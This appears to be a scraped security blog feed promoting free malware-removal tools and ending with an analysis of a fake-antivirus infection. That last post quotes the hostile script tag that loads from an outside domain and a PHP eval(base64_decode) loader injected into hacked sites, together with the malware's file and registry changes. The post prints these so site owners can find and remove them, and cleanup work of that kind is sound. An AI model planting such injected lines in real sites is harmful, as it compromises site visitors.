Grant Admin Full Control is a small and very simple application that will add a new option to your Context Menu to take control over your files and folders.

Grant Admin Full Control has a simple and comprehensive interface that will quickly guide you through all its features.

Supported Files

Dynamic Link Library (.dll)
Execute File (.exe)

Grant Admin Full Control Requirements:
.Net Framework 2.0 Must be installed in End user PC

Grant Admin Full Control Command Line Arguments:
· “Grant Access.exe” /m for open as minimized
· “Grant Access.exe” /e for Enable
· “Grant Access.exe” /d for Disable

Download from Softpedia.com

http://www.softpedia.com/get/System/File-Management/Grant-Admin-Full-Control.shtml

About Author

Rahulmg
rahulmg.blogspot.com
pcusersworld.blogspot.com

Report bugs and errors here as Comments if any.

Related posts:

1. The New Version of Swizzor Trojan Not Detected Yet and How to Remove it Manually
2. 6 Must Have Replacement Tools when Fixing a Computer Infected by Virus
3. How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah

Description:

If you have reached this page, then you probably have a very serious security problem which none of the well-known antivirus/antispyware software is able to deal with.

CaSIR is a FREE software to remove CaSIs.

What are CaSIs?

CaSIs is short for Common and Stubborn Infectors. These are malicious programs (Viruses, Worms, Trojans, etc.) that are notoriously difficult to detect and to remove by regular anti-virus programs. These malicious programs often have the capability to disable your computer or your anti-virus programs.

Good examples of these infectors are:

Win32.Brontok.q
Win32.Delf.cc
Win32.VB.by
Win32.VB.cz
Trojan.Win32.Small.wv (Medichi & Medichi2)
Trojan-Downloader.Win32.Todon.ai
Trojan-Downloader.Win32.Todon.aj
Worm.Win32.AutoRun.dkk (Ahsan virus)
Trojan-Downloader.Win32.VB.bbl

If one of the above nasty infectors infected your computer, you will not be able to install any of the well-known Antivirus software like Kaspersky, Mcafee, Norton, AVG, Panda… (and about 135 more different AVs!) and please, don’t try to use Safe Mode to remove them manually because those infectors will disable “Safe Mode”!

How do you get infected by these CaSI’s?

Well, mostly because you open an attachment from an email that isn’t from one of your friends. Or by using infected removable storage media (CDs,DVDs/Floppy disks/Flash disks, Memory Cards…). Or just by visiting a suspicious website which can result in your computer being compromised.

The only thing that could have saved you was having a good Anti-Virus program with up-to-date signatures. If you didn’t have those installed on your computer these CaSI’s could enter your system with ease and change lots of settings and take over your machine!

Once you are infected, NOTHING (no well-known anti-virus program) can rescue you anymore. You and your computer are doomed.

But now there is a solution and it is called CaSIR

What is CaSIR?

CaSIR (Common And Stubborn Infections Remover) — is an on-demand malware removal software. We designed it especially to remove the most common and stubborn infections from your computer. It can remove their running processes, their bodies, their registry entries and any other leftovers!

CaSIR doesn’t randomly search for CaSIs, but he goes directly to the areas that a specific CaSI infects and removes it from there, hence, it does its job in mere seconds!

CaSIR does more than that. It has a generic and strong technique that allows it to do the following:

. CaSIR removes the common restrictions made to your computer by these infectors which none of the AVs deal with.
. CaSIR removes the illegitimate services/processes frequently used by these infectors.
. CaSIR recognizes and instantly kills and deletes any running process/service that is disguising itself among the legitimate system services/processes.
. CaSIR removes any scripts used by these infectors to autorun.
. CaSIR removes any autostarting registry entries related to the illegitimate services/processes he detects.
. CaSIR deals with all your storage media (Fixed, floppy, removable…) and cleans them up all if need be.
. CaSIR cleans up your system registry so no more spy keys, garbage activities or messages keep asking for already deleted files.
. CaSIR’s signatures are fully updatable, once you download the software, all you need to do is to download the new definitions file frequently and you’re up-to-date and ready-to-go.

How to use CaSIR?

Just extract the zip-file you download which contains only two files:
- CaSIR35.exe: The main executable file.
- casirdef.cas The definitions file.

Simply run CaSIR (in Normal Mode) and press Start, Wait for seconds’ and you’re done!

If CaSIR detected any CaSIs, it will restart your computer and works in what we call “Pre-$hell mode”, after finishing it’s job, CaSIR will restart your computer in Normal mode.

Important notes:

1. Since CaSIR is a security software that deal with your file system, your system registry and running processes and services, it MUST be given all the rights it demands in order to remove any infection. Some other security software will try to block CaSIR or even flag it as malicious and prevent it from doing its job, please make sure it’s not blocked and there’s no other program blocking CaSIR. During disinfection process we recommend you to disable any other security solution you are running such as Antivirus, Firewall, monitoring tools ..etc.

2. Please do NOT attempt to run CaSIR in safe mode, CaSIR needs to investigate your system to know what CaSIs are active, if you ran CaSIR in safe mode, he might not be able to detect any active CaSIs, as they usually do not run in safe mode!

3. If you have more than one infected computer connected together to the same network, do NOT attempt to use CaSIR on the infected computer while the other infected ones are connected to it, this would results in getting infected again and again. You always need to disconnect the infected computer from the network before using CaSIR and do so with all your infected computers one by one!

What is “CDS Jobs” button? and why is it there?

CDS is short for “CaSIR Deep Scanner”. This is the part of CaSIR which uses the classic method of searching for malware; By the binary signature. We have added this new section of CaSIR starting from v2.0 because we lately noticed that some CaSIs’ authors have developed a new method of making identifying their malware more difficult, that is to make the CaSI spread using random file names, random registry keys, random registry values and random running processes names, so that any algorithm based on the malware File/Folder/RegKey/RegVal/Running Modules/Processes/Threads names would fail and be of no use!

If CaSIR detected any such a nasty CaSIs (those with random techniques), he will analyze the situation first and kill the active parts of the CaSI, then invoke the CDS which will scan all your hard disks/floppy disks/flash disks/memory cards/iPod/MP3/WMA Drivers available on your system to clean them, then he will restart your computer in Pre-$hell mode to continue removing the other CaSIs, after finishing it’s job, CaSIR will restart your computer in normal mode with a “Congratulations” message!

Please note that you can cancel those operations at any time, but we strongly don’t recommend that, because by doing that, you will put your computer in a dangerous situation as the CaSI will come back again when you restart your computer, so please be patient and let CaSIR finish it’s job.

Does CaSIR generate a log report?

Yes, after every phase of work, CaSIR will automatically generate a report file and saves it in same folder where CaSIR is. The report file always has the name: casirrpt.txt! This file is needed by us when you have any problem or inquiry and need to contact us, so please don’t forget to attach this file with your inquiry.

How to update CaSIR definitions?

There’s two methods of getting updates, offline and Online:

1. Online method:
Simply press “Update” button and follow the instructions on screen.

2. Offline method:
Visit www.sergiwa.com and go to downloads section, under Security software, you’ll find CaSIR Definitions file. Download it. The definitions file is a very small zipped file that contains the CaSIs signatures. All you have to do is to download casirdef.zip, extract its contents and replace it with the old one!

What are those RNP, GFL, SFL, GFD, SFD, RKM, RKD, RKA, RSO?

When CaSIR find an infection on your computer, it shows up the infection in the following way :

XXX – YYY

XXX: is the type of the infection found
YYY: is the infection itself

XXX has 9 different keywords

RNP : Running Process
GFL : Group of Files
SFL : Single File
GFD : Group of Folders
SFD : Single Folder
RKM : Registry Key to be Modified
RKD : Registry Key to be Deleted
RKA : Registry Key to be Added
RSO: Regular System Optimization

Do you have to buy CaSIR?

No; you don’t have to. CaSIR is 100% free of charge (for personal use only).

Download CaSIR from Here

CaSIR
Developer: Issam Sergiwa
Company: Sergiwa Software
OS: Windows XP, Windows Vista, Windows 7
Bugs? Problems?
Contact support@sergiwa.com

Related posts:

1. Removal of Advanced Virus Remover (Manual)
2. How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah
3. How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools

Use our free and newly improved Malware Cleaner tool to scan and clean your computer from viruses, trojans and other types of malware. This simple and user friendly tool not only detects malicious software but also removes them from your computer.

What are the most common symptoms of an infected computer?

• Freezing or sudden restarts – Your computer behaves unexpectedly during normal use
• Unusual updates by you on Facebook or Twitter – Especially after you’ve clicked on a link that appeared not to work or installed a new application
• Emails you didn’t send – Your friends tell you they’ve received emails you didn’t send

If you suspect your computer might be infected, download and run the new Malware Cleaner for free today!

Remember: the Malware Cleaner is a solution when your computer is already infected. Keeping safe requires a security
solution that protects your computer from malicious software. The easiest and most efficient way to protect your online
identity and your computer against these threats is an antivirus software or an all-in-one security solution. If you don’t
have one, your computer might be infected without you knowing about it.

Key features

• Easy to install and run
• Detect and Remove malware (viruses, Rootkit’s, FakeAV, worms and more)
• Utilize advanced Anti-Rootkit technology
• Quarantine module to process the detected files
• Deep scan and cleaning including Norman patented Norman SandBox technology
• Supports Quick- and Deep Scan mode
• New command line function for better tailor scanning across several machines (businesses)
• Daily signature updates available

Supported operating systems: Windows 98, Me, NT, 2000, XP, 2003, Vista, 2008 and 7.

Download Norman Malware Cleaner.exe (139 MB)

Related posts:

1. Get Free One Year License of New Norman Antivirus & Antispyware (By softgeeek.blogspot.com)
2. Free DE-Cleaner by Avira, Kaspersky and Symantec for Anti-Botnet
3. Sophos Anti-Rootkit updated – download it for free

Minimum Requirements for the DE-Cleaner powered by Avira:

• Computer from Pentium, at least 266MHz
• Windows XP with at least SP 2, (32 oder 64 Bit)
• Windows Vista (32 oder 64 Bit, SP 1 or higher recommended) Windows 7 (32 or 64 Bit)
• At least 150 MB free disk space
• At least 192 MB memory on Windows XP
• At least 512 MB memory on Windows Vista, Windows 7
• Internet connection for Updating und first time Download
• Please note: At the moment there is no DE-Cleaner available for Linux or Mac OS. Since Internet criminals mainly concentrate on and attack Windows based computers.

DE-Cleaner powered by Avira Download 
[exe-File; ca. 53 MB] – Version 10.0.11.1

The DE-Cleaner has been made available with friendly support from 

You can find a guideline in html-format here.

The following detailed guidelines are are also available as a PDF file for downloading:
Guidelines DE-Cleaner [pdf; ca. 218 KB; To Date: 21. February 2011]
For viewing this file you will need a PDF-Reader, i.e. Freeware Foxit PDF Reader. Note: On most computers a PDF reader is already installed.

DE-Cleaner powered by Kaspersky

Minimum Requirements for the DE-Cleaner powered by Kaspersky:

• 80 MB free diskspace
• Windows XP with at least min. SP 2, min. 256 MB RAM
• Windows Vista, min. 512 MB Ram
• Windows 7, min. 1 GB RAM
  Please note: At the moment there is no DE-Cleaner available for Linux or Mac OS. Since Internet criminals mainly concentrate on and attack Windows based computers.

Download DE-Cleaner powered by Kaspersky 
[exe-file; ca. 75 MB] – Version 9.0.0.722

The DE-Cleaner has been made available with friendly support from 

You can find a guideline in html-format here.

The following detailed guidelines are are also available as a PDF file for downloading:
Guidelines DE-Cleaner [pdf; ca. 934 KB; To Date: 10.December 2010]
For viewing this file you will need a PDF-Reader, i.e. Freeware Foxit PDF Reader. Note: On most computers a PDF reader is already installed.

DE-Cleaner powered by Symantec

Minimum Requirements for the DE-Cleaner powered by Symantec:

• Processor from 300 MHz
• 256 MB RAM
• an active Internet connection
• Windows XP (from SP2, 32 Bit) / Windows Vista (32 and 64 Bit) / Windows 7 (32 and 64 Bit)
  Please note: At the moment there is no DE-Cleaner available for Linux or Mac OS. Since Internet criminals mainly concentrate on and attack Windows based computers.

Download DE-Cleaner powered by Symantec
[exe-file; ca. 6 MB] – Version 1.5.1.1

The DE-Cleaner has been made available with friendly support from 

You can find guidelines in html-format here.

The following detailed guidelines are are also available as a PDF file for downloading
Guidelines DE-Cleaner [pdf; ca. 504 KB; To Date: 10.December 2010]
For viewing this file you will need a PDF-Reader, i.e. Freeware Foxit PDF Reader. Note: On most computers a PDF reader is already installed.

Important Notice:

• To avoid any problems, please read and follow DE-Cleaner guidelines before downloading and executing.
• Be sure to secure your data before beginning the cleanup i.e. your personal data, graphics, documents, videos. You will find a guideline on backing-up your data in
  Information Resource for Windows Backup Software NTBackup
• Restore Option for DE-Cleaner powered by Avira:
  If it turns out that a certain program no longer runs, you can use this guideline for in restoring your system.
• Restore Option for DE-Cleaner powered by Kaspersky:
  If it turns out that a certain program no longer runs; there is a DE-Cleaner option to restore deleted files: After your PC has been restarted, i.e. after the program has restarted, click on the circle, (top right) in the splashscreen. Click on the tab “Erkannte Bedrohung” (known threats) and click on the cross, “Status: Gelˆscht” (Status: Deleted). Select the file with a right-mouse click that you want restored, followed by clicking on “Wiederherstellen” (Restore)
• Restore Option for DE-Cleaner powered by Symantec:
  If it turns out that a certain program no longer runs; there is a DE-Cleaner option to restore deleted files – by using the “Überprüfen” button which reverses all actions taken. Or, you can restore files by using the “windows system restore point” option. It should also be taken into account that if a “system restore” is run, it could be possible that your PC becomes re-infected.
• After checking your PC with our DE-Cleaner, it is also recommended that you run a complete scan with an Anti-Virus scanner.
• In some cases it can happen that after a malicious file has been deleted the computer will no longer function correctly. We recommend a New Installation.
• If you software is wrongly detected as malicious by the DE-Cleaner powered by Symantec you will find in the FAQs appropriate measures.
• If you need assistance with concerning a technical matter, please do not hesitate and use technik@botfrei.de

Source: www.botfrei.de

Related posts:

1. Get the New NORMAN Malware Cleaner for Free Today
2. Kaspersky Anti-Virus & Internet Security 2010 V9.0.0.313 Beta
3. New Version of Fujacks Worm ( W32.Fujacks.CB ) Discovered By Symantec

Scriptable malware remover engine that can remove any malware running custom scripts.

Threat Killer is a fully-scriptable malware remover able to remove persistent files, kernel drivers installed by rootkits, registry keys and values, terminate processes (even if critical), delete an entire folder (also using recursive) and much more by executing custom scripts.

The scripts are executed in runtime and you should be able to remove a specific malware without the need to reboot the computer, however is possible that to remove nasty malware is needed to reboot the computer.

It is strongly recommended to use Threat Kill only under qualified supervision, certain misuses of this program can create problems on your system.

Key Features

• Fully Scriptable Engine
• Kill Processes
• Unregister Dlls
• Copy/Move Files
• Delete Files
• Delete Folders Recursive
• Delete Folders Empty Folders
• Delete registry keys and values
• Empty registry values
• Set registry values
• Programs to launch
• Stop Drivers
• Unload Drivers
• Delete Drivers
• Backups
• Multilingual
• BBCode friendly output
• Add to Explorer Context Menu
• Work in background

Download :

http://www.novirusthanks.org/products/threat-killer/

Related posts:

1. Submit a Threat Sample – Is a New Service from VirusExperts.org
2. Removal tool for Generic.Malware.SL!!M.807DC390 (mso.exe, usbflash.com) Keylogger
3. Remove Total Security 2009 virus / adware (Manual)

The SalityKiller.exe utility given in this article allows detecting and disinfecting only the following Sality modification Virus.Win32.Sality.aa, Virus.Win32.Sality.ae, Virus.Win32.Sality.ag, Virus.Win32.Sality.bh.

In order to disinfect a computer from Virus.Win32.Sality, do the following:

If infected computers are in the local network under domain control:

Step 1. Preparation to disinfection:

• Download the file SalityKiller.zip
• Unpack the file SalityKiller.zip
• Run the file SalityKiller.exe on each computer in turn (for example, through Kaspersky Administration Kit, or the server group policy).
  • on all computers on which the domain administrator can register and work

While disinfecting this group of the computers do not log on under domain administrator on any other computers to prevent further spread of the infection in the network.

• • on all other computers

Do not stop or terminate work of the utility until all computers in the network have been disinfected.

Step 2. Algorithm of computer disinfection.

Computers on which you log on under a domain administrator rights should be disinfected first. Once these computers are disinfected, start disinfecting other computers in the network.

• Run the utility SalityKiller.exe on the infected computers once again (no additional commands to run the utility are needed).
• A reboot might require after disinfection.
• Make sure that the anti-virus icon in system tray has turned red thus indicating the anti-virus software is fully functional. If otherwise, reinstall the anti-virus via Kaspersky Administration Kit.
• Update the anti-virus databases (signature threats) for the Kaspersky Lab’s product installed on your PC. If you cannot download the updates from the Internet, update from the zip-archives. 
  • how to update Kaspersky Lab’s products version 5.0 from the zip archives.
  • how to update Kaspersky Lab’s products version 6.0 from the zip archives
  • how to update Kaspersky Lab’s products version 7.0 from the zip archives
• set the full scan options to their maximum scan level
• run full computer scan

Step 3. Signs of a disinfected/ clean computer

• Kaspersky Anti-Virus is running and works in normal mode
• full computer scan does not detect infected objects on the computer

Step 4. Cleaning the registry of infected computers in the domain network:

• download the file Sality_RegKeys.zip
• unpack the file Sality_RegKeys.zip
• run the file Disable_autorun.reg from the archive Sality_RegKeys.zip

  You can also disable autorun from all devices by running the SalityKiller utility with parameter -a.

• Click Yes to confirm adding the information to the registry

• once the scan is over, from the archive Sality_RegKeys.zip run the file of the registry key: 
  • under Windows 2000 run the registry file SafeBootWin200.reg
  • under Windows XP run the registry file SafeBootWinXP.reg
  • under Windows 2003 run the registry file SafeBootWinServer2003.reg
  • under Windows Vista / 2008 run the registry file SafebootVista.reg
  • under Windows 7 / 2008 R2 run the registry file SafebootWin7.reg

If infected computer are not in the network

• Disable the technologies iSwift and iChecker, if one of the following products is installed and running on your PC:
  • Kaspersky Anti-Virus 7.0
  • Kaspersky Internet Security 7.0
  • Kaspersky Anti-Virus 6.0
  • Kaspersky Internet Security 6.0
  • Kaspersky Anti-Virus  2009;
  • Kaspersky Internet Security 2009;
  • Kaspersky Anti-Virus 2010;
  • Kaspersky Internet Security 2010;
  • Kaspersky Anti-Virus 2011;
  • Kaspersky Internet Security 2011;
  • Kaspersky PURE;
  • Kaspersky Anti-Virus 6.0 for Windows Workstations
  • Kaspersky Anti-Virus 6.0 SOS
  • Kaspersky Anti-Virus 6.0 for Windows Servers
• Download and unpack the file SalityKiller.zip
• Run the file SalityKiller.exe
• A reboot might require after disinfection.

With an installed Kaspersky Lab product you might be prompted to allow any activity to the process Sality_killer.exe

• • Go to Start > All programs > right-click Startup > select Open

• • Right-click any place in the Startup folder
  • In the menu select New > Shortcut
  • In the Create Shortcut window click Browse
  • Browse the folder into which the file SalityKiller.exe was unpacked
  • Highlight the file SalityKiller.exe
  • Click the OK button
  • Click Next
  • Click OK

     

     

     

     

• Download the file Sality_RegKeys.zip
• Unpack the file Sality_RegKeys.zip
• Run the file Disable_autorun.reg from the archive Sality_RegKeys.zip

   

   

   

  You can also disable autorun from all devices by running the SalityKiller utility with parameter -a.

• Click Yes to confirm adding the information to the registry

• Update the anti-virus databases (threat signatures) for the installed Kaspersky Lab’s product. If you cannot download the necessary databases (threat signatures) form the Internet, update the databases from the zip archives:
  • how to update Kaspersky Lab’s products version 5.0 from the zip archives
  • how to update Kaspersky Lab’s products version 6.0 from the zip archives
  • how to update Kaspersky Lab’s products version 7.0 from the zip archives
• set the full scan options to their maximum scan level
• run full computer scan
• once the scan is over, from the archive Sality_RegKeys.zip run the file of the registry key: 
  • under Windows 2000 run the registry file SafeBootWin200.reg
  • under Windows XP run the registry file SafeBootWinXP.reg
  • under Windows 2003 run the registry file SafeBootWinServer2003.reg
  • under Windows Vista / 2008 run the registry file SafebootVista.reg
  • under Windows 7 / 2008 R2 run the registry file SafebootWin7.reg

You can restore the registry branch SafeBoot which is needed for a PC to be able to boot in safe mode, by running SalityKiller.exe with parameter -j.

Additional parameters to run SalityKiller.exe from command line:

-p

– scan a specific folder;
-n – scan network disks;
-r – scan flash drives, scan removable hard disks connected via USB and Fire Wire;
-y – close the window when the utility finishes;
-s - scan in “silent” mode (without opening console box);
-l – write log to the file;
-v – detailed logging (must be used in combination with -l);
-x - restore possibility to view hidden and system files;
-a – disable autorun from any devices;
-j – restore the registry branch SafeBoot (if it is deleted, the PC will not be able to start up in Safe mode);
-m – monitoring mode to protect the system from getting infected;
-q – scan the system and then go to monitoring mode;
-k – the utility will scan all disks, detect files autorun.inf created by the virus Virus.Win32.Sality and eliminate them. It will also delete the executable file linked by autorun.inf, even if such file has been already disinfected.

Related posts:

1. How To Remove and fix Virus.Win32.Sality Win32/Sality.ah Win32/Sality.ag with Kaspersky Tools
2. How To Remove Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah
3. Fix .exe extension for ( Virus.Win32.Sality.aa Win32/Sality.AM W32/Sality.ah ) infected PC

Related posts:

1. Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware
2. Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware
3. Removal tool for Generic.Malware.SL!!M.807DC390 (mso.exe, usbflash.com) Keylogger

How to detect virus files?

Virus files now a days are more improved and hard to find than earlier, now some files have nice icon so user cant imagine that file is virus or unwanted. Normal Properties of virus or infected files, that always tries to connect internet and get other unwanted softwares or files to the victims computer.

Some Trojan files like Sality.AA copies its file to windows\system32 with same file size, so it can identify easily, some may in hidden, and creates files in all folder with same name as folder. For Example, i have a folder in C:\myfolder, when this trojan infect the system, creates files in that folder with name myfolder.exe with size ~499 KB, if we open that file nothing opens but system will get busy. Like that so many files where created in those Drives and folders.

How To Delete these files:

Use Windows Search utility or any alternative, before that find file size of file created, like myfolder.exe, if this filesize is 499 KB, add file size in Search parameter so you can easily delete all folder named execute files.

Note:

If any exe file is running, you cannot delete some files, before that end those suspected file processess. You can use Windows Task Manager or any Alternative Task Processes lister like Process Explorer.
Get Process explorer from
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx
http://en.wikipedia.org/wiki/Process_Explorer

From Process Explorer you can delete files, download this free program.

Detect Infected Virus Files.

To Detect infected files is simple. If you think your normal application tooks more time than normal, it may be the cause of virus infection. Bitdefender is the Best Antivirus software can be used in Disinfection of virus infected files.

Related posts:

1. 6 Must Have Replacement Tools when Fixing a Computer Infected by Virus
2. Removal of Advanced Virus Remover (Manual)
3. Remove Virus.Win32.Sality.aa, Virus.Win32.Sality.ae, Virus.Win32.Sality.ag, Virus.Win32.Sality.bh from windows 7 by kaspersky removal

RootRepeal is a new rootkit detector currently in public beta.

It is designed with the following goals in mind:

1. Easy to use – a user with little to no computer experience should be able to use it.
2. Powerful – it should be able to detect all publicly available rootkits.
3. Stable – it should work on as many different system configurations as possible, and, in the event of an incompatibility, not crash the host computer.
4. Safe – it will not use any rootkit-like techniques (hooking, etc.) to protect itself.

Currently, RootRepeal includes the following features:

1. Driver Scan – scans the system for kernel-mode drivers.  Displays all drivers currently loaded, and shows if a driver has been hidden, and whether the driver’s file is visible on-disk.
2. Files Scan – scans any fixed drive on the system for hidden, locked or falsified* files.
3. Processes Scan – scans the system for processes.  Displays all processes currently running, and shows if a processes is hidden or locked.
4. SSDT Scan – shows whether any of the functions in the System Service Descriptor Table (SSDT) are hooked.
5. Stealth Objects Scan – attempts to determine if any rootkits are active by looking for typical symptoms.
6. Hidden Services Scan – scans for hidden system services.
7. Shadow SSDT Scan – counterpart to the SSDT Scan, but deals mostly with graphics and window-related functions.

* – falsified files are files which have their size mis-reported to the Windows API.  Some rootkits use this to hide data.

RootRepeal is currently in public beta.  Whereas every effort has been made to ensure compatibility with every system configuration on Windows 2000, XP, 2003 and Vista, it cannot be guaranteed.  There is always some risk when scanning for rootkits.  Before running RootRepeal, please make sure you have backups of all important data and have saved all open documents.

System Requirements

• Microsoft® Windows 2008 Server; Windows Vista®; Windows XP Professional or Home Edition; Windows 2000 with Service Pack 4; Windows 2003 Server
  Note: Only x86 versions of Windows are supported.
• 128MB of RAM.
• 600KB of hard-drive space.

Download: RootRepeal.rar
MD5 (of the EXE): 880D7A26B7BB6B00A0709E75F149B83D
SHA-1 (of the EXE): 1943798277BBB1C396A980C58D077F5A57636932

VirusTotal Scan: http://www.virustotal.com/analisis/dd2d8492185ded564fdae8f5a1d85946123c346086763a238b0d74f1e2848259-1250214648

NOTE : Because, as mentioned above, there is always an element of risk when scanning for rootkits, the author offers NO WARRANTY for RootRepeal.  USE AT YOUR OWN RISK!

The latest version of RootRepeal can always be found at the static links http://rootrepeal.googlepages.com/RootRepeal.rar, or http://rootrepeal.googlepages.com/RootRepeal.zip (see below for more mirrors, in case the bandwidth limits have been exceeded).

Note: This site has recently been exceeding bandwidth, so if any of the above download links are unavailable, please use one of the following:

http://ad13.geekstogo.com/RootRepeal.zip
http://ad13.geekstogo.com/RootRepeal.rar
http://rootrepeal.psikotick.com/RootRepeal.zip
http://rootrepeal.psikotick.com/RootRepeal.rar

For more info about this project :  http://sites.google.com/site/rootrepeal/

Related posts:

1. Sophos Anti-Rootkit updated – download it for free
2. Removal of Advanced Virus Remover (Manual)
3. Removal tool for Generic.Malware.SL!!M.807DC390 (mso.exe, usbflash.com) Keylogger

Severity Level : 8/10

Alias:

• Mal/FakeAV-BW [Sophos]
• Generic FakeAlert!hr [McAfee]
• Packed.Win32.Krap.an [Kaspersky Lab]
• NOT Detected [Microsoft]

packupdate_build107_302.exe VirusTotal Report : (Click Here)

Infected Websites

This Malware is coming  from  infected website most of them hosted by GoDaddy, they Tweeted about this matter (http://twitter.com/GoDaddy/status/13199601776).

When the site got infected you will see the following line inserted just before the </body> tag  in the source of any of the PHP pages:

<script src="http://kdjkfjskdfjlskdjf.com/kp.php"></script>

When you examine each of the PHP pages, you see this line at the top of all of them (The hacked code):

<?php /**/ eval(base64_decode("Random Code" ));?>

When you decode this, it equates to:

Remove The hacked code from infected sites

Search inside all index.php and *.php files for these codes and delete it :

1-  <script src=“http://kdjkfjskdfjlskdjf.com/kp.php“></script>

2-  <?php /**/ eval(base64_decode(“Random Code“ ));?>

Removing that from all your index and PHP files should solve the problem.

Infected PCs With ( Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an )

File System Modifications

The following files were created in the system:

• %APPDATA%\My Security Engine\ Instructions.ini
  
• %APPDATA%\My Security Engine\ winupdate.exe
• %APPDATA%\Microsoft\Internet Explorer\Quick Launch\ My Security Engine.lnk
• %USERPROFILE%\Desktop\ My Security Engine.lnk
• %USERPROFILE%\Recent\ cb.drv
• %USERPROFILE%\Recent\ CLSV.dll
• %USERPROFILE%\Recent\ eb.dll
• %USERPROFILE%\Recent\ eb.exe
• %USERPROFILE%\Recent\ eb.sys
• %USERPROFILE%\Recent\ exec.exe
• %USERPROFILE%\Recent\ fan.dll
• %USERPROFILE%\Recent\ fix.dll
• %USERPROFILE%\Recent\ FW.dll
• %USERPROFILE%\Recent\ kernel32.exe
• %USERPROFILE%\Recent\ pal.dll
• %USERPROFILE%\Recent\ ppal.exe
• %USERPROFILE%\Recent\ snl2w.dll
• %USERPROFILE%\Recent\ tjd.sys
• %USERPROFILE%\Start Menu\My Security Engine.lnk
• %USERPROFILE%\Start Menu\Programs\My Security Engine.lnk
• %ALLUSERSPROFILE%\Application Data\e5adcb6\8654.mof
• %ALLUSERSPROFILE%\Application Data\e5adcb6\MSE.ico
• %ALLUSERSPROFILE%\Application Data\e5adcb6\MSe5ad.exe
• %ALLUSERSPROFILE%\Application Data\e5adcb6\MSESys\vd952342.bd
• %ALLUSERSPROFILE%\Application Data\MSJMKE\MSTSKDKCKE.cfg

Note:

• %system% is a variable that refers to the System folder. By default, this is “C:\Windows\System” (Windows 95/98/Me), “C:\Winnt\System32″ (Windows NT/2000), or “C:\Windows\System32″ (Windows XP).
• ? = Random file name.

Memory Modifications

There were new processes created in the system:

The following Internet action was started (the retrieved bits are saved into the local file):

Registry Modifications

The newly created or modified Registry Value is:

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler]
@=”Implements DocHostUIHandler”

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]

[HKEY_CLASSES_ROOT\MSe5ad.DocHostUIHandler\Clsid]
@=”{3F2BBC05-40DF-11D2-9455-00104BC936FF}”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}]
@=”Implements DocHostUIHandler”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\LocalServer32]
@=”C:\\DOCUME~1\\ALLUSE~1.WIN\\APPLIC~1\\e5adcb6\\MSe5ad.exe”

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]

[HKEY_CLASSES_ROOT\CLSID\{3F2BBC05-40DF-11D2-9455-00104BC936FF}\ProgID]
@=”MSe5ad.DocHostUIHandler”

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer]

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]

[HKEY_CLASSES_ROOT\Software\Microsoft\Internet Explorer\SearchScopes]
“URL”=”http://findgala.com/?&uid=2045&q={searchTerms}”

[HKEY_CURRENT_USER\Software\3]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“IIL”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“ltHI”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“ltTST”=dword:0000ba3e

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer]
“PRS”=”http://127.0.0.1:27777/?inj=%ORIGINAL%”

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation]
“MSCompatibilityMode”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Enable”=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Size”=dword:0000000a

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“InitHits”=dword:00000064

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU]
“Factor”=dword:00000014

[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\88AA5029C7E29F56EE18C3764A808C2A6CE0BE8E]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\cnpxhcqngr_ohvyq106_2045.rkr”=hex:01,00,00,00,06,00,00,00,c0,57,8f,87,79,ef,ca,01,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACVQY:%pfvqy2%\\Zl Frphevgl Ratvar.yax”=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACVQY:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Fgneg Zrah\\Zl Frphevgl Ratvar.yax”=hex:01,00,00,00,02,00,00,00,00,00,00,00,00,00,00,00,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
